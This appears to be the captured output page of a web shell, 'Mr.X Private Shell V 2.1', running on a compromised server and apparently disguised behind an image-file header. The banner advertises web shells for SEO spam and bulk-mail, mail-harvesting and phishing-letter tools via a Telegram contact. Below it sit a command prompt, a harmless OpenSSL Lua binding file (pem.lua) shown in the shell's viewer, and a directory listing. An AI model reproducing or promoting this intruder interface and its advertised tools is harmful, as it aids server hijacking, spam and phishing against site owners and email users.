����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
local ffi = require "ffi"

require "resty.openssl.include.ossl_typ"

ffi.cdef [[
  // all pem_password_cb* has been modified to pem_password_cb to avoid a table overflow issue
  typedef int (*pem_password_cb)(char *buf, int size, int rwflag, void *userdata);
  EVP_PKEY *PEM_read_bio_PrivateKey(BIO *bp, EVP_PKEY **x,
  // the following signature has been modified to avoid ffi.cast
    pem_password_cb cb, const char *u);
  //  pem_password_cb *cb, void *u);
  EVP_PKEY *PEM_read_bio_PUBKEY(BIO *bp, EVP_PKEY **x,
  // the following signature has been modified to avoid ffi.cast
    pem_password_cb cb, const char *u);
  //  pem_password_cb *cb, void *u);
  int PEM_write_bio_PrivateKey(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
    unsigned char *kstr, int klen,
    pem_password_cb *cb, void *u);
  int PEM_write_bio_PUBKEY(BIO *bp, EVP_PKEY *x);

  RSA *PEM_read_bio_RSAPrivateKey(BIO *bp, RSA **x,
  // the following signature has been modified to avoid ffi.cast
    pem_password_cb cb, const char *u);
  //  pem_password_cb *cb, void *u);
  RSA *PEM_read_bio_RSAPublicKey(BIO *bp, RSA **x,
  // the following signature has been modified to avoid ffi.cast
    pem_password_cb cb, const char *u);
  //  pem_password_cb *cb, void *u);
  int PEM_write_bio_RSAPrivateKey(BIO *bp, RSA *x, const EVP_CIPHER *enc,
    unsigned char *kstr, int klen,
    pem_password_cb *cb, void *u);
  int PEM_write_bio_RSAPublicKey(BIO *bp, RSA *x);

  X509_REQ *PEM_read_bio_X509_REQ(BIO *bp, X509_REQ **x, pem_password_cb cb, void *u);
  int PEM_write_bio_X509_REQ(BIO *bp, X509_REQ *x);

  X509_CRL *PEM_read_bio_X509_CRL(BIO *bp, X509_CRL **x, pem_password_cb cb, void *u);
  int PEM_write_bio_X509_CRL(BIO *bp, X509_CRL *x);

  X509 *PEM_read_bio_X509(BIO *bp, X509 **x, pem_password_cb cb, void *u);
  int PEM_write_bio_X509(BIO *bp, X509 *x);

  DH *PEM_read_bio_DHparams(BIO *bp, DH **x, pem_password_cb cb, void *u);
  int PEM_write_bio_DHparams(BIO *bp, DH *x);

  EC_GROUP *PEM_read_bio_ECPKParameters(BIO *bp, EC_GROUP **x, pem_password_cb cb, void *u);
  int PEM_write_bio_ECPKParameters(BIO *bp, const EC_GROUP *x);

]]

Filemanager

Name Type Size Permission Actions
evp Folder 0755
x509 Folder 0755
asn1.lua File 1.69 KB 0644
bio.lua File 385 B 0644
bn.lua File 2.47 KB 0644
conf.lua File 214 B 0644
crypto.lua File 469 B 0644
dh.lua File 1.25 KB 0644
ec.lua File 1.95 KB 0644
ecdsa.lua File 497 B 0644
err.lua File 1.02 KB 0644
evp.lua File 5.21 KB 0644
hmac.lua File 502 B 0644
objects.lua File 637 B 0644
ossl_typ.lua File 2.78 KB 0644
param.lua File 3.45 KB 0644
pem.lua File 2.07 KB 0644
pkcs12.lua File 1.14 KB 0644
provider.lua File 1.02 KB 0644
rand.lua File 544 B 0644
rsa.lua File 876 B 0644
ssl.lua File 2.92 KB 0644
stack.lua File 1.1 KB 0644
x509_vfy.lua File 4.57 KB 0644
x509v3.lua File 3.59 KB 0644